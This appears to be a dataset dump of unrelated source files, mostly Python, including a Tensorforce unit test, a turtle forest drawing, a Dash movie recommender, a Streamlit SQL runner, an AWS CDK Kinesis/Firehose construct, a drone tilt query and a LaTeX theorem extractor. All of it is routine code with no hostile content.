content stringlengths 5 1.05M |
|---|
# Copyright 2018 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest
import sys
from tensorforce import util
from tensorforce.agents import VPGAgent
from tensorforce.tests.agent_unittest import UnittestBase
class TestParameters(UnittestBase, unittest.TestCase):
    """Exercises the parameter schedules accepted by the agent's
    ``exploration`` argument: constant, random, piecewise-constant,
    decaying, and Ornstein-Uhlenbeck."""

    agent = VPGAgent

    def parameter_unittest(self, name, exploration):
        """Run a short act/observe cycle and check the queried exploration value.

        :param name: label passed to ``prepare`` for this configuration
        :param exploration: exploration parameter specification under test
        """
        states = dict(type='float', shape=(1,))
        actions = dict(type='int', shape=(), num_values=3)
        agent, environment = self.prepare(
            name=name, states=states, actions=actions, exploration=exploration
        )
        agent.initialize()
        states = environment.reset()
        # query='exploration' makes act() also return the current scalar value
        actions, exploration_output1 = agent.act(states=states, query='exploration')
        self.assertIsInstance(exploration_output1, util.np_dtype(dtype='float'))
        states, terminal, reward = environment.execute(actions=actions)
        agent.observe(terminal=terminal, reward=reward)
        if name != 'constant':
            # Non-constant schedules should produce a different value on the
            # next timestep.
            actions, exploration_output2 = agent.act(states=states, query='exploration')
            self.assertNotEqual(exploration_output2, exploration_output1)
            states, terminal, reward = environment.execute(actions=actions)
            agent.observe(terminal=terminal, reward=reward)
        # Explicitly passing an exploration value must be echoed back verbatim.
        exploration_input = 0.5
        actions, exploration_output = agent.act(
            states=states, query='exploration', exploration=exploration_input
        )
        self.assertEqual(exploration_output, exploration_input)
        agent.close()
        environment.close()
        sys.stdout.flush()
        self.assertTrue(expr=True)

    def test_constant(self):
        """Fixed exploration value."""
        self.parameter_unittest(name='constant', exploration=0.1)

    def test_random(self):
        """Uniformly random exploration value per timestep."""
        exploration = dict(type='random', distribution='uniform')
        self.parameter_unittest(name='random', exploration=exploration)

    def test_piecewise_constant(self):
        """Step schedule: 0.1 before the boundary, 0.0 after."""
        exploration = dict(
            type='piecewise_constant', dtype='float', unit='timesteps', boundaries=[0],
            values=[0.1, 0.0]
        )
        self.parameter_unittest(name='piecewise-constant', exploration=exploration)

    def test_decaying(self):
        """Exponentially decaying exploration value."""
        exploration = dict(
            type='decaying', unit='timesteps', decay='exponential', initial_value=0.1,
            decay_steps=1, decay_rate=0.5
        )
        self.parameter_unittest(name='decaying', exploration=exploration)

    def test_ornstein_uhlenbeck(self):
        """Ornstein-Uhlenbeck process exploration."""
        exploration = dict(type='ornstein_uhlenbeck')
        self.parameter_unittest(name='ornstein-uhlenbeck', exploration=exploration)
|
from django.contrib.admin.templatetags.admin_list import pagination
from django.template import Library
register = Library()
@register.inclusion_tag('admin/pagination_top.html')
def pagination_top(cl):
    """Render the change-list pagination with the top-of-page template.

    Context building is delegated to Django admin's stock ``pagination``
    tag helper; only the template differs.
    """
    context = pagination(cl)
    return context
__author__ = 'Vinayak Marali'
__author__ = 'Pavan Prabhakar Bhat'
"""
CSCI-603: Lab 2 (week 2)
Section 03
Author: Pavan Prabhakar Bhat (pxb8715@rit.edu)
Vinayak Marali (vkm7895@rit.edu)
This is a program that draws a forest with trees and a house.
"""
# Imports required by the program
import turtle
import random
import math
# global constants
UNIT = 50
# to store the height of trees
treeHt=[]
def init():
    """
    Initializes the window for drawing. (1200,800) is the window setup
    :pre: (relative) pos(0,0), heading (east), up
    :post: relative position, heading (east), up
    :param: None
    :return: None
    """
    turtle.setup(1200, 800)
    turtle.penup()
    # Walk to the lower-left starting point: turn around, travel left,
    # then travel down, ending heading east again.
    moves = ((180, 10 * UNIT), (90, 4 * UNIT))
    for angle, distance in moves:
        turtle.left(angle)
        turtle.forward(distance)
    turtle.left(90)
def drawTrunk(size):
    """
    Draws the trunk of a tree and returns the turtle to its start position.
    :pre: (relative) position, heading (east), down
    :post: (relative) position, heading (east), up
    :param size: length of the tree trunk to be drawn
    :return: None
    """
    turtle.pendown()
    turtle.left(90)
    turtle.forward(size)
    turtle.penup()
    # retrace the trunk back down so the turtle ends where it started
    turtle.right(180)
    turtle.forward(size)
    turtle.left(90)
def drawSpace():
    """
    Leaves a horizontal gap between the trees or between a house and a tree.
    :pre: (relative) position, heading (east), up
    :post: (relative) position, heading (east), up
    :return: None
    """
    turtle.penup()
    gap = 2 * UNIT
    turtle.forward(gap)
def drawTree(treeNo, isHouse, houseNo):
    """
    Draws the forest: treeNo randomly-shaped trees, optionally with a house
    inserted after houseNo trees.
    :pre: (relative) position, heading (east), up
    :post: (relative) position, heading (east), up
    :param treeNo: number of trees to draw
    :param isHouse: 'y' when a house should be inserted in the forest
    :param houseNo: after how many trees the house appears
    :return: wood obtained from the trees (sum of all trunk heights)
    """
    # counts the number of trees that are printed
    count = 0
    # set once the house has been drawn so it is drawn at most once
    flag = 0
    while treeNo > 0:
        # Required to generate a random type of tree
        randomtree = random.randint(1, 3)
        if randomtree == 1:
            # Triangle-topped tree, short trunk (1-2 units)
            trunkheight = UNIT * random.randint(1, 2)
            treeHt.append(trunkheight)
            drawTrunk(trunkheight)
            turtle.left(90)
            turtle.forward(trunkheight)
            turtle.left(90)
            turtle.penup()
            turtle.forward(0.5 * UNIT)
            turtle.pendown()
            turtle.right(120)
            turtle.forward(UNIT)
            turtle.right(120)
            turtle.forward(UNIT)
            turtle.right(120)
            turtle.penup()
            turtle.forward(0.5 * UNIT)
            turtle.penup()
            turtle.left(90)
            turtle.forward(trunkheight)
            turtle.left(90)
            drawSpace()
            count = count + 1
        elif randomtree == 2:
            # Circle-topped tree, trunk 1-3 units
            trunkheight = UNIT * random.randint(1, 3)
            treeHt.append(trunkheight)
            drawTrunk(trunkheight)
            turtle.left(90)
            turtle.forward(trunkheight)
            turtle.right(90)
            turtle.pendown()
            turtle.circle(0.5 * UNIT)
            turtle.penup()
            turtle.right(90)
            turtle.forward(trunkheight)
            turtle.left(90)
            drawSpace()
            count = count + 1
        elif randomtree == 3:
            # Tall triangle tree drawn with the pen down, trunk 1-4 units
            trunkheight = UNIT * random.randint(1, 4)
            treeHt.append(trunkheight)
            drawTrunk(trunkheight)
            turtle.pendown()
            turtle.left(90)
            turtle.forward(trunkheight)
            turtle.left(90)
            turtle.forward(0.5 * UNIT)
            turtle.right(120)
            turtle.forward(UNIT)
            turtle.right(120)
            turtle.forward(UNIT)
            turtle.right(120)
            turtle.forward(0.5 * UNIT)
            turtle.penup()
            turtle.left(90)
            turtle.forward(trunkheight)
            turtle.left(90)
            drawSpace()
            count = count + 1
        if isHouse == 'y' and count == houseNo and flag == 0:
            flag = 1
            # FIX: the return value was previously bound to an unused local
            # ('hlumber'); the house's lumber is accounted for in main().
            drawHouse(50)
            drawSpace()
        treeNo = treeNo - 1
    return sum(treeHt)
def drawHouse(unit):
    """
    Draws the house on the screen
    :pre: (relative) pos (0,0), heading (east), down
    :post: (relative) pos (0,0), heading (east), up
    :param unit: constant required to build the walls and roof of the house
    :return: wood required to build the house
    """
    # Each roof side is the hypotenuse of a right triangle with legs 'unit'.
    slope = unit * math.sqrt(2)
    turtle.pendown()
    turtle.left(90)
    turtle.forward(2 * unit)
    turtle.right(45)
    turtle.forward(slope)
    turtle.right(90)
    turtle.forward(slope)
    turtle.right(45)
    turtle.forward(2 * unit)
    turtle.left(90)
    turtle.penup()
    # two walls plus the two roof slopes
    return 2 * unit + slope + slope + 2 * unit
def drawstar(hStar):
    """
    Draws the star on the screen
    :pre: (relative) pos (0,0), heading (east), down
    :post: (relative) pos (0,0), heading (east), down
    :param hStar: height (in pixels) at which the star is drawn
    :return: None
    """
    # climb to the star's height before putting the pen down
    turtle.left(90)
    turtle.forward(hStar)
    turtle.pendown()
    # Each arm: stroke out 20, retrace 10 back to the centre, turn, repeat.
    turtle.forward(20)
    turtle.right(180)
    turtle.forward(10)
    turtle.left(90)
    turtle.forward(10)
    turtle.right(180)
    turtle.forward(20)
    turtle.right(180)
    turtle.forward(10)
    turtle.left(45)
    turtle.forward(10)
    turtle.right(180)
    turtle.forward(20)
    turtle.right(180)
    turtle.forward(10)
    turtle.left(90)
    turtle.forward(10)
    turtle.right(180)
    turtle.forward(20)
def drawSun():
    """
    Draws the sun (a circle of radius 15) at the current position.
    :pre: (relative) position, heading (east), down
    :post: (relative) position, heading (east), down
    :return: None
    """
    turtle.pendown()
    radius = 15
    turtle.circle(radius)
def main():
    """
    The main function: draws the night forest (trees, optional house, star),
    then rebuilds the collected lumber into one house during the day.
    :pre: (relative) pos (0,0), heading (east)
    :post: (relative) pos (0,0), heading (east)
    :return: None
    """
    # lumber contributed by the house (stays 0 unless a house is drawn)
    hlumber = 0
    turtle.bgcolor('black')
    turtle.pencolor('white')
    init()
    # Number of trees required by the user
    treeNo = int(input('Enter the number of trees '))
    isHouse = input('Is there a house in the forest (y/n)? ')
    # generates the house at random locations
    if isHouse == 'y':
        if treeNo >= 2:
            houseNo = random.randint(1, treeNo - 1)
            # FIX: count the house's lumber only when a house is actually
            # drawn; previously it was added even on the treeNo < 2 path.
            hlumber = 2 * 50 + 50 * math.sqrt(2) + 50 * math.sqrt(2) + 2 * 50
        else:
            print('There have to be at least 2 trees for the house to be printed')
            houseNo = 0
        tlumber = drawTree(treeNo, isHouse, houseNo)
    else:
        tlumber = drawTree(treeNo, isHouse, 0)
    # draws the star 10 pixels higher than the highest tree
    # (guard against an empty forest so max() does not raise)
    hStar = (max(treeHt) if treeHt else 0) + UNIT + 10
    drawstar(hStar)
    # Total lumber from the trees and the house
    lumber = hlumber + tlumber
    # wall height chosen so walls + roof use exactly the lumber collected
    wallht = lumber / (2 + math.sqrt(2))
    input('Night is done, press enter for day')
    turtle.reset()
    init()
    turtle.bgcolor('white')
    turtle.pencolor('black')
    input('We have ' + str(lumber) + ' units of lumber for the building.')
    input('We will build a house with walls ' + str(wallht) + ' tall.')
    drawHouse(wallht / 2)
    drawSpace()
    turtle.left(90)
    turtle.forward(wallht * 2)
    drawSun()
    input('Day is done, house is built, press enter to quit')


# Calling the main function
if __name__ == '__main__':
    main()
|
"""
This displays the user-based filtering page
"""
from ast import literal_eval
from collections import defaultdict
import pandas as pd
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
import numpy as np
from app import APP
import global_record
import grab_list
import display_final_movie
COLORS = {
    'background': '#111111',
    'text': '#000080'
}
# number of movie recommendations shown on the page
NUM_FINAL_RECOMMEND = 10
# user id -> list of recommended movie names from the collaborative model
COP = defaultdict(list)
# Pre-computed collaborative-filtering results; column 1 is a serialized
# Python list, hence the literal_eval converter.
df = pd.read_csv('movies-dataset/source/collaborative_result.csv',
                 header=None, index_col=0, converters={1: literal_eval})
for row in df.iterrows():
    # print([item for item in row[1][0]])
    tmp_list = list(row[1])
    # keep only the first element of each pair -- presumably the movie
    # name (it is later looked up in id_title_set); TODO confirm
    COP[int(row[0])] = [item[0] for item in tmp_list[0]]
obs = grab_list.read_csv()
id_set = obs.id_set
id_title_set = obs.id_title_set
user_val = []
# dropdown options for user ids 1..466
user_val.extend([{'label': str(i), 'value': i} for i in np.arange(1, 467, 1)])
def main():
    """
    Build the user-based filtering page.

    :return: an html div with all content to be displayed for the user-based
        filtering: a user-id input, a Find User button, and the movie list.
    """
    # initial movie list shown before any user is selected
    movie_div = display_final_movie.add_final_movies(zip(
        range(NUM_FINAL_RECOMMEND),
        global_record.INITIAL_MOVIE_ID_LIST[10:(10 + NUM_FINAL_RECOMMEND)]))
    search_bar = html.Div(
        children=[
            html.Div(children='Please type a user ID',
                     style={'text-align': 'center',
                            'font-size': '16px',
                            'margin-bottom': '20px'}),
            html.Div(dcc.Input(
                # FIX: removed pointless ''.format() call on the literal id
                id='user_id_dropdown',
                type='number',
                placeholder="Please enter a user id",
                style={'font-size': '13px',
                       'width': '100%'}
            ))
        ]
    )
    search_button_div = html.Div(html.Button(id='user_id_button',
                                             children='Find User',
                                             style={'font-size': '13px'}),
                                 style={'margin-top': '50px',
                                        'margin-bottom': '20px',
                                        'width': '40%',
                                        'margin-left': '30%',
                                        'text-align': 'center'})
    app_recommender_tab = html.Div(children=[])
    app_recommender_tab.children.append(html.Div(html.H1('User-based Filtering'),
                                                 className='wrap'))
    app_recommender_tab.children.append(html.Div(search_bar, style={'margin-top': '15px'}))
    app_recommender_tab.children.append(search_button_div)
    app_recommender_tab.children.append(html.Div(id='recommend_main_div', children=movie_div))
    return app_recommender_tab
def call_back_recom():
    """
    Register the callback for the Find User button.
    :return: an updated html div after the button is clicked
    """
    list_state = [State('user_id_dropdown', 'value')]

    @APP.callback(
        Output('recommend_main_div', 'children'),
        [Input('user_id_button', 'n_clicks')],
        list_state)
    def update_multi_output(n_clicks, *input_value):
        # Identify which component triggered the callback.
        # NOTE(review): user_click is computed but never used afterwards.
        ctx = dash.callback_context
        if not ctx.triggered:
            user_click = 'No clicks yet'
        else:
            user_click = ctx.triggered[0]['prop_id'].split('.')[0]
        if n_clicks is not None and n_clicks > 0:
            list_filter = list(input_value)
            user_id = int(list_filter[0])
            print(user_id)
            list_next_movie_id = []
            # map recommended movie names to numeric ids, keeping known titles
            movie_names = COP[user_id]
            # movie_names = COP.user_recommendation_dic[user_id]
            for mn in movie_names:
                print(mn)
                if mn in id_title_set:
                    #print(id_title_set[mn])
                    list_next_movie_id.append(int(id_title_set[mn]))
            print(list_next_movie_id)
            ls = []
            # drop ids that are not present in the master id set
            for ids in list_next_movie_id:
                if ids in id_set:
                    ls.append(ids)
            list_next_movie_id = ls
            num_movie_rate = len(list_next_movie_id)
            print(list_next_movie_id)
            result = display_final_movie.add_final_movies(zip(range(num_movie_rate), list_next_movie_id))
            return result
        else:
            # nothing clicked yet -- leave the current children untouched
            raise PreventUpdate
# NOTE(review): main() only builds and returns the layout div; running this
# module directly discards the result -- presumably the page is wired up via
# the app module in normal use. Confirm this entry point is still needed.
if __name__ == '__main__':
    main()
|
import streamlit as st
from src.database import Database
from src.utils import setup_logger, excel_download_link
logger = setup_logger()
def home_page():
    """Render the 'Excel SQL Runner' page: an SQL form plus query results."""
    logger.info({"message": "Loading home page."})
    st.title("Excel SQL Runner")
    st.write("Here you can run SQLs on your excel files.")
    st.write("You can use `Add table` in sidebar menu to upload your excel files to temporary database.")
    # Create Database object
    database = Database(file_name=st.session_state.db_name)
    df_query = None
    with st.form(key="home_form"):
        sql_text = st.text_area("SQL-statement", value="SELECT * FROM table",
                                height=300,
                                help="SQL-statement based on SQLite syntax.")
        if st.form_submit_button(label='Run query'):
            logger.info({"message": "Running query"})
            df_query = database.query(sql_text)
    if df_query is not None:
        # offer the result as a downloadable excel file
        st.markdown(excel_download_link(df_query), unsafe_allow_html=True)
        row_count = len(df_query)
        if row_count > 1000:
            # cap on-screen output at 1000 rows
            st.write(df_query.head(1000))
            st.write("Displaying first 1000 rows.")
        else:
            st.write(df_query)
            st.write("Displaying {} rows.".format(row_count))
    logger.info({"message": "Home page loaded."})
#!/usr/bin/env python
#-*- coding=utf-8 -*-
#
# Copyright 2012 Jike Inc. All Rights Reserved.
# Author: liwei@jike.com
# Strings are immutable: item assignment raises TypeError (Python 2 script).
try:
    s = 'abc'
    s[0] = 'b'
except TypeError:
    print 'str is not mutable'
# Tuples are immutable too.
try:
    t = (1, 2, 3)
    t[0] = 2
except TypeError:
    print 'tuple is not mutable'
class A(object):
    """Tiny value holder used to demonstrate mutation vs. rebinding below."""
    def __init__(self):
        self.a = 'a'
    def __str__(self):
        return self.a
def modify(obj):
    """Mutate the caller's object in place; the change is visible outside."""
    setattr(obj, 'a', 'b')
def rebind(obj):
    """Rebind only the local name; the caller's object stays untouched."""
    replacement = A()
    replacement.a = 'c'
    obj = replacement
obj = A()
# modify() mutates the shared object, so the change is visible here.
print 'before modify %s' % obj
modify(obj)
print 'after modify %s' % obj
# rebind() only reassigns its local name, so obj still prints 'b'.
rebind(obj)
print 'after rebind %s' % obj
|
""" Kinesis Stream and Firehose Construct """
import os
from aws_cdk import (
core,
aws_iam,
aws_kinesis,
aws_kinesisfirehose,
aws_logs
)
from accounts.accounts import fetch_account_central
# Deployment account comes from the CDK CLI environment; the central account
# (used for cross-account KMS access below) is derived from it.
ACCOUNT_NUMBER = os.environ.get('CDK_DEPLOY_ACCOUNT')
CENTRAL_ACCOUNT_NUMBER = fetch_account_central(ACCOUNT_NUMBER)
class KinesisConstruct(core.Construct):
    """ Kinesis Stream and Firehose Construct """
    # S3 destination settings for the Firehose delivery stream
    bucket_arn: str
    prefix: str
    errorOutputPrefix: str

    def __init__(
        self,
        scope: core.Construct,
        id: str,  # pylint: disable=redefined-builtin
        bucket_arn: str,
        prefix: str,
        errorOutputPrefix: str,
        database: str,
        table: str,
        **_kwargs
    ):
        """Create a Kinesis stream and a Firehose that converts incoming
        JSON records to Parquet (using the Glue table schema) and delivers
        them to the given S3 bucket.

        :param bucket_arn: destination bucket for converted records
        :param prefix: S3 key prefix for successful deliveries
        :param errorOutputPrefix: S3 key prefix for failed deliveries
        :param database: Glue database holding the target table
        :param table: Glue table describing the Parquet output schema
        """
        super().__init__(scope, id)
        self.bucket_arn = bucket_arn
        self.prefix = prefix
        self.errorOutputPrefix = errorOutputPrefix
        self.database = database
        self.table = table
        #Kinesis Stream
        self.kinesis_stream = aws_kinesis.Stream(
            self,
            id='stream'
        )
        # CloudWatch log group/stream for Firehose delivery errors
        log_group = aws_logs.LogGroup(
            self,
            id="FirehoseLogGroup",
            removal_policy=core.RemovalPolicy.DESTROY
        )
        log_stream = aws_logs.LogStream(
            self,
            id="FirehoseLogStream",
            log_group=log_group,
            removal_policy=core.RemovalPolicy.DESTROY
        )
        # Firehose needs: S3 write, Glue schema read, source-stream read,
        # CloudWatch log write, and cross-account KMS for decryption.
        role_firehose_policy = aws_iam.PolicyDocument(statements=[
            aws_iam.PolicyStatement(
                actions=[
                    "s3:AbortMultipartUpload",
                    "s3:GetBucketLocation",
                    "s3:GetObject",
                    "s3:ListBucket",
                    "s3:ListBucketMultipartUploads",
                    "s3:PutObject",
                    "s3:PutObjectAcl",
                    "kinesis:DescribeStream",
                    "glue:Get*",
                    "glue:Put*",
                    "glue:Update*",
                    "logs:PutLogEvents"
                ],
                resources=[
                    self.bucket_arn,
                    "{}/*".format(self.bucket_arn),
                    'arn:aws:kinesis:*:*:stream/data-gov*',
                    f'arn:aws:glue:*:{core.Aws.ACCOUNT_ID}:catalog',
                    f'arn:aws:glue:*:{core.Aws.ACCOUNT_ID}:database/*',
                    f'arn:aws:glue:*:{core.Aws.ACCOUNT_ID}:table/*',
                    f"arn:aws:logs:*:{core.Aws.ACCOUNT_ID}:log-group:{log_group.log_group_name}:log-stream:{log_stream.log_stream_name}"
                ]
            ),
            aws_iam.PolicyStatement(
                effect=aws_iam.Effect.ALLOW,
                actions=[
                    "kms:Encrypt",
                    "kms:Decrypt",
                    "kms:ReEncrypt*",
                    "kms:GenerateDataKey*",
                    "kms:DescribeKey"
                ],
                # keys live in the central account, not the deploy account
                resources=[f"arn:aws:kms:*:{CENTRAL_ACCOUNT_NUMBER}:key/*"]
            )
        ])
        role_firehose = aws_iam.Role(
            self, "FirehoseRole",
            assumed_by=aws_iam.ServicePrincipal("firehose.amazonaws.com"),
            inline_policies={
                "FirehosePolicy": role_firehose_policy
            }
        )
        self.kinesis_stream.grant_read(role_firehose)
        #Kinesis Firehose
        aws_kinesisfirehose.CfnDeliveryStream(
            self,
            id="DeliveryFirhose",
            delivery_stream_type="KinesisStreamAsSource",
            kinesis_stream_source_configuration={
                "kinesisStreamArn": self.kinesis_stream.stream_arn,
                "roleArn": role_firehose.role_arn,
            },
            extended_s3_destination_configuration={
                "bucketArn": self.bucket_arn,
                "prefix": self.prefix,
                "errorOutputPrefix": self.errorOutputPrefix,
                "roleArn": role_firehose.role_arn,
                # records are converted to Parquet, which compresses itself
                "compressionFormat": "UNCOMPRESSED",
                "bufferingHints": {
                    "intervalInSeconds": 60,
                    "sizeInMBs": 64,
                },
                # JSON in -> Parquet out, schema taken from the Glue table
                "dataFormatConversionConfiguration": {
                    "enabled" : True,
                    "inputFormatConfiguration" : {
                        "deserializer": {
                            "openXJsonSerDe": {
                            }
                        }
                    },
                    "outputFormatConfiguration" : {
                        "serializer" : {
                            "parquetSerDe" : {}
                        }
                    },
                    "schemaConfiguration" : {
                        "catalogId": core.Aws.ACCOUNT_ID,
                        "databaseName": self.database,
                        "tableName": self.table,
                        "roleArn": role_firehose.role_arn,
                        "region": core.Aws.REGION,
                        "versionId": "LATEST"
                    }
                },
                "cloudWatchLoggingOptions": {
                    "enabled" : True,
                    "logGroupName" : log_group.log_group_name,
                    "logStreamName" : log_stream.log_stream_name
                }
            }
        )
import os
import csv
import random
from sys import breakpointhook
# rows loaded from the word file; each entry is a list of csv fields
words = []
# column of the row that holds the word itself
position = 0
# only words of exactly this many letters are loaded
word_size = 9
#word_list="words_alpha.txt"
word_list="norvig_100000.txt"
def load_words():
    """Reload the global word list, keeping only rows whose word has exactly
    ``word_size`` letters.

    Reads ``word_list`` as a tab-separated file; silently does nothing when
    the file is missing.
    """
    words.clear()
    if os.access(word_list, os.F_OK):
        # FIX: context manager guarantees the file is closed even on error
        # (previously a bare open()/close() pair).
        with open(word_list) as f:
            for row in csv.reader(f, delimiter='\t'):
                if len(row[position]) == word_size:
                    words.append(row)
def show_words():
    """Print every loaded word with its 1-based index."""
    for index, word in enumerate(words, start=1):
        show_word(word, index)
    print()
def show_word(word, index):
    """Print one row: right-aligned index followed by the word itself."""
    print("{0:>3} {1:<200} ".format(index, word[position]))
def show_quiz():
    """Pick a random word, show its letters shuffled, and check the player's
    answer against the original word."""
    r_index = int(random.random() * len(words))
    answer = str(words[r_index][0])
    print("Conundrum is : " + ''.join(random.sample(answer, word_size)))
    # FIX: the prompt was accidentally printed twice; once is enough.
    print("Enter your answer ")
    word = input("Answer " + " : ")
    print(word)
    if word == answer:
        print("answer is right ", answer)
    else:
        print("answer is wrong ", answer)
def menu_choice():
    """ Find out what the user wants to do next. """
    print("Choose one of the following options?")
    print(" s) Show")
    print(" n) Set word size")
    print(" p) Play Conundrum")
    print(" q) Quit")
    choice = input("Choice: ")
    lowered = choice.lower()
    # guard clause: valid selections return immediately
    if lowered in ('s', 'q', 'p', 'n'):
        return lowered
    print(choice + "?")
    print("Invalid option")
    return None
def main_loop():
    """Menu loop: show words, change the word length, play, or quit."""
    global word_size
    load_words()
    while True:
        choice = menu_choice()
        # FIX: identity comparison for None (was 'choice == None')
        if choice is None:
            continue
        if choice == 'q':
            print("Exiting...")
            break  # jump out of while loop
        elif choice == 's':
            show_words()
        elif choice == 'p':
            show_quiz()
        elif choice == 'n':
            print("Enter word length ")
            word_size = int(input())
            # the word list must be rebuilt for the new length
            load_words()
        else:
            print("Invalid choice.")
# The following makes this program start running at main_loop()
# when executed as a stand-alone program (it does not run on import).
if __name__ == '__main__':
    main_loop()
'''Testing library for the applequest web app'''
|
import olympe
import os
from olympe.messages.ardrone3.PilotingSettingsState import MaxTiltChanged
DRONE_IP = os.environ.get("DRONE_IP", "10.202.0.1")
def test_maxtiltget():
    """Connect to the drone, print its current MaxTilt setting, disconnect."""
    uav = olympe.Drone(DRONE_IP)
    uav.connect()
    current_tilt = uav.get_state(MaxTiltChanged)["current"]
    print("Drone MaxTilt = ", current_tilt)
    uav.disconnect()
if __name__ == "__main__":
test_maxtiltget()
|
class Solution:
    def numSteps(self, s: str) -> int:
        """Return the number of steps to reduce binary string *s* to "1".

        One step halves an even value (drops a trailing 0) or adds one to
        an odd value. The original stub had no body; this simulates the
        process right-to-left with a carry bit instead of big-integer
        arithmetic: O(len(s)) time, O(1) extra space.
        """
        steps = 0
        carry = 0
        # process every bit except the leading one
        for i in range(len(s) - 1, 0, -1):
            if int(s[i]) + carry == 1:
                # odd value: add 1 (producing a carry), then halve -> 2 steps
                carry = 1
                steps += 2
            else:
                # even value (bit 0, or bit 1 plus carry): one halving step
                steps += 1
        # a leftover carry turns the leading 1 into 10, needing one more halve
        return steps + carry
|
# eg1: identical ints compare equal -> True
x = 4
y = 4
print(x==y)
# eg2: an int is never equal to a str -> False
x = 5
y = '5'
print(x==y)
# eg3: string comparison is case sensitive -> False
x = 'Python'
y = 'python'
print(x==y)
# eg4: normalise case before comparing -> prints 'python', then True
x = 'Python'
y = 'python'
print(x.lower())
print(x.lower()==y)
# eg5: sets are unordered, so same members compare equal -> True
print({5,6,7} == {7,6,5})
|
#!/usr/bin/env python
from operator import *
class MyObj(object):
    """Wrapper demonstrating that the operator-module functions (lt, add)
    dispatch to the matching dunder methods (Python 2 script)."""
    def __init__(self,val):
        super(MyObj,self).__init__()
        self.val = val
    def __str__(self):
        return"MyObj(%s)"%self.val
    def __lt__(self,other):
        print'Testing %s < %s'%(self,other)
        return self.val < other.val
    def __add__(self,other):
        print'Adding %s + %s'%(self,other)
        return MyObj(self.val + other.val)
# operator.lt / operator.add invoke the dunder hooks defined above,
# which print a trace line before returning their result.
a = MyObj(1)
b = MyObj(2)
print'Comparision:'
print lt(a,b)
print'\nArithmetic:'
print add(a,b)
|
import click
import csv
from enum import Enum
import re
# environment type -> aliases accepted in \begin{...}/\end{...} tags
EXTRACTABLE_TYPES = {
    "theorem": ["thm", "theorem"],
    "definition": ["def", "definition"],
    "corollary": ["cor", "corollary"],
    "lemma": ["lem", "lemm", "lemma"],
}
class RegexParts(Enum):
    """Index of each capture group in the regex built by RegexBuilder.

    NOTE(review): the trailing commas make every member's .value a 1-tuple,
    which is why callers index with ``.value[0]``. Removing the commas would
    require updating those call sites in the same change.
    """
    ExtraCharactersBeforeBeginTag = 0,
    MainBeginTag = 1,
    ExtraCharactersAfterBeginTag = 2,
    ExtraOptionsWithBrackets = 3,
    ExtraOptionsWithoutBrackets = 4,
    LabelWithoutBrackets = 5,
    MainContent = 6,
    ExtraCharactersBeforeEndTag = 7,
    MainEndTag = 8,
    ExtraCharactersAfterEndTag = 9,
class RegexBuilder:
    """Builds a regex that captures one \\begin{...}...\\end{...} environment
    for a given extractable type (theorem, lemma, ...)."""

    def __init__(self, type):
        self.type = type
        # Build the regex from the individual components
        self.regex = self.build_regex_options()
        self.regex += self.build_tag_matcher('begin', extra_options_brackets=True)
        self.regex += self.build_content_matcher()
        self.regex += self.build_tag_matcher('end')

    @staticmethod
    def build_regex_options():
        # Make regex case insensitive; '.' also matches newlines (dotall)
        return '(?is)'

    @staticmethod
    def build_content_matcher():
        # FIX: raw string -- '\s' in a plain literal is an invalid escape
        # (DeprecationWarning on Python 3); the pattern value is unchanged.
        return r'\s*(.*?)?\s*'

    def build_tag_matcher(self, tagname, extra_options_brackets=False):
        """Match ``\\begin{tag}`` or ``\\end{tag}``; begin tags may carry
        an optional ``[options]`` or ``\\label{...}`` suffix."""
        tag_matcher = r'\\'
        tag_matcher += tagname
        tag_matcher += r'\{'
        tag_matcher += self.build_tagname_matcher()
        tag_matcher += r'\}'
        if extra_options_brackets:
            # raw-string form of the original pattern, value-identical
            tag_matcher += r'(\[([^\]]*)\]|\s*\\label\{([^\}]*)\})?'
        return tag_matcher

    def build_tagname_matcher(self):
        """Alternation over the aliases of ``self.type``, allowing extra
        letters/underscores on either side (e.g. ``thm_main``)."""
        tag_names = '('
        for i, tag_name in enumerate(EXTRACTABLE_TYPES[self.type]):
            tag_names += tag_name
            if i != len(EXTRACTABLE_TYPES[self.type]) - 1:
                tag_names += '|'
        tag_names += ')'
        extra_characters_matcher = '([a-z_]*)'
        return '%s%s%s' % (extra_characters_matcher, tag_names, extra_characters_matcher)

    def get_regex(self):
        """Return the assembled pattern string."""
        return self.regex
class MatchedOutputProcessor:
    """Turns a regex match for one environment into a csv row."""

    def __init__(self, type):
        self.type = type

    def get_csv_array(self, match):
        """Return ``[type, name, content]`` for *match*, or None when the
        match has no content group."""
        groups = match.groups()
        extra_options = groups[RegexParts.ExtraOptionsWithoutBrackets.value[0]]
        if not extra_options:
            extra_options = groups[RegexParts.LabelWithoutBrackets.value[0]]
        name = self.get_name(extra_options)
        content = groups[RegexParts.MainContent.value[0]]
        return None if content is None else [self.type, name, content]

    @staticmethod
    def get_name(extra_options):
        """Extract a human-readable name from a label or a name=... option."""
        if extra_options is None or not len(extra_options):
            return ''
        if ':' not in extra_options:
            # Either this is already the full name, OR this contains 'name='
            match = re.search('name=([^,]+)?', extra_options)
            return match.groups()[0] if match else extra_options
        # Name is given by a label, which is usually of the form cor:bla,
        # so keep everything after the first colon.
        parts = extra_options.split(':')
        if len(parts) > 2:
            return ':'.join(parts[1:])
        return parts[0] if len(parts) == 1 else parts[1]
@click.command()
@click.argument('input', type=click.File('r'))
@click.argument('output', type=click.File('w'))
def cli(input, output):
    r"""This script processes a TEX file (input), and extract any \begin-\end pairs of tags that are specified in
    EXTRACTABLE_TYPES. Those are then written to a csv file (output).
    """
    tex_content = input.read()
    csv_writer = csv.writer(output, delimiter=';')
    for type in EXTRACTABLE_TYPES:
        # one regex per extractable type; count how many matches are kept
        regex = RegexBuilder(type).get_regex()
        type_count = 0
        output_processor = MatchedOutputProcessor(type)
        pattern = re.compile(regex)
        for match in re.finditer(pattern, tex_content):
            row = output_processor.get_csv_array(match)
            if row is not None:
                csv_writer.writerow(row)
                type_count += 1
        print("Found %d valid elements of type %s." % (type_count, type))
# Copyright (c) 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
